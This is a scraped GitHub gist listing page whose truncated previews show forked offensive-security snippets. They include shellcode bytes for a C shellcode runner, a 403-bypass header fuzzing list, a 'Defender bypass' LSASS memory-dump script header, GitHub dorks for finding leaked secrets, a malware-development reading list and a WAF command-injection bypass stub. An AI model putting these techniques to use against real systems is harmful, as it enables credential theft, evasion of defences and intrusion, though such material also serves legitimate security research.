https://gist.github.com/mate-h/fc8f21bd3ce9e3ad1737b85f795bab07
https://github.com/venaxyt/mysterium
cossinadevil2k
cossinadevil2k
/ JasonToddIsTheBestRobin.c
Created
September 25, 2025 19:41
— forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
cossinadevil2k
/ README.md
Created
May 2, 2025 08:24
— forked from lgg/README.md
Python reverse unpyarmor
cossinadevil2k
/ main.spec
Created
November 25, 2024 09:30
— forked from kienonline19/main.spec
yolo-spec-build-exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- mode: python ; coding: utf-8 -*- | |
| from PyInstaller.utils.hooks import collect_data_files | |
| from ultralytics import YOLO | |
| block_cipher = None | |
| ultra_files = collect_data_files('ultralytics') | |
| a = Analysis( | |
| ['main.py'], | |
| pathex=[], |
cossinadevil2k
/ 403-Bypass-Headers-List.txt
Created
October 27, 2024 12:24
— forked from Spix0r/403-Bypass-Headers-List.txt
I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I’ve compiled a list of headers you can fuzz to potentially bypass 403 restrictions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Allow: CONNECT | |
| Allow: GET | |
| Allow: HEAD | |
| Allow: POST | |
| Allow: TRACE | |
| Client-IP: 0 | |
| Client-IP: 0177.0000.0000.0001 | |
| Client-IP: 0x7F000001 | |
| Client-IP: 10.0.0.0 | |
| Client-IP: 10.0.0.1 |
cossinadevil2k
/ PSWA.md
Created
October 21, 2024 14:01
— forked from MHaggis/PSWA.md
Ref: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
# PrivCheck
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
Write-Warning "Please run this script as an Administrator!"
Exit
cossinadevil2k
/ bin2sc.py
Created
October 3, 2024 12:15
— forked from superkojiman/bin2sc.py
Convert bin to shellcode.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| if __name__ == "__main__": | |
| if len(sys.argv) < 2: | |
| print "usage: %s file.bin\n" % (sys.argv[0],) | |
| sys.exit(0) | |
| shellcode = "\"" | |
| ctr = 1 | |
| maxlen = 15 |
cossinadevil2k
/ lsass_dump.py
Created
October 3, 2024 11:41
— forked from MohitDabas/lsass_dump.py
Windows Defender Bypass Dump LSASS Memory with Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import win32api | |
| import win32con | |
| import win32process | |
| import win32security | |
| import win32file # For CreateFile | |
| import ctypes | |
| from ctypes import wintypes | |
| import os | |
| import psutil |
cossinadevil2k
/ GitHub-Leaked-API-Keys-and-Secrets.md
Created
August 26, 2024 16:38
— forked from win3zz/GitHub-Leaked-API-Keys-and-Secrets.md
As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.
(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))
**1.
cossinadevil2k
/ All-Mal-Dev.md
Created
August 18, 2024 04:29
— forked from 0prrr/All-Mal-Dev.md
Malware Dev Reading List
- https://www.vx-underground.org/archive.html
- https://www.vx-underground.org/windows.html
- https://doxygen.reactos.org/index.html
- https://www.hexacorn.com/
- https://modexp.wordpress.com/
- https://klezvirus.github.io/
- https://zerosum0x0.blogspot.com/
- https://www.binarly.io/posts/index.html
- https://0xdarkvortex.dev/blogs/
cossinadevil2k
/ server.js
Created
June 7, 2024 22:04
— forked from mohemiv/server.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env node | |
| /* | |
| Accompanying code for the tweet in PT SWARM. | |
| Tweet's text: | |
| Simple way to bypass a WAF in Command Injections! | |
| Also helps with length restrictions! | |
| Tweet's link: https://twitter.com/ptswarm/status/1799069750863270364 |
NewerOlder